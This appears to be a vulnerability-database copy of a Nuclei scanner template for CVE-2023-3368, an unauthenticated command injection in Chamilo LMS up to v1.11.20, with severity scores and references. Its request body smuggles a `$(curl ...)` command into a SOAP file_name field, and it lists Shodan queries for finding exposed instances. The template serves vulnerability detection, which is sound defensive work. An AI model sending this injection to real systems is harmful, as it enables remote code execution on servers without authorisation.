nuclei | ProjectDiscovery | NUCLEI:CVE-2023-3368
History: Nov 29, 2023 - 9:34 p.m.

Chamilo LMS <= v1.11.20 Unauthenticated Command Injection

2023-11-29 21:34:56
ProjectDiscovery
github.com
cve2023
chamilo
unauthenticated
command injection
remote code execution

CVSS3: 9.8 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.8 High (Confidence: High)

EPSS: 0.934 High (Percentile: 99.1%)

Command injection in `/main/webservices/additional_webservices.php`
id: CVE-2023-3368

info:
  name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: |
    Command injection in `/main/webservices/additional_webservices.php`
    in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
    remote code execution via improper neutralisation of special characters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3368
    - https://starlabs.sg/advisories/23/23-3368/
    - https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
    - https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
    - https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3368
    cwe-id: CWE-78
    epss-score: 0.93283
    epss-percentile: 0.99063
    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: chamilo
    product: chamilo
    shodan-query:
      - http.component:"Chamilo"
      - http.component:"chamilo"
      - cpe:"cpe:2.3:a:chamilo:chamilo"
  tags: cve2023,cve,chamilo,unauth,cmd,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/main/webservices/additional_webservices.php"

    headers:
      Content-Type: application/xml

    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body>
          <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
              <item>
                <key xsi:type="xsd:string">file_data</key>
                <value xsi:type="xsd:string"></value>
              </item>
              <item>
                <key xsi:type="xsd:string">file_name</key>
                <value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
              </item>
              <item>
                <key xsi:type="xsd:string">service_ppt2lp_size</key>
                <value xsi:type="xsd:string">720x540</value>
              </item>
            </param0>
          </ns1:wsConvertPpt>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "wsConvertPptResponse"
        part: body

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a0047304502204203ba81fa59deac5f8f0d0493727281f224ec0c682985a92a6e5399f6744213022100a8aec5d2c5159a5d6ec7bda077faa90c224689b24475f9cd3d24b1e18eed12b1:922c64590222798bb761d5b6d8e72950
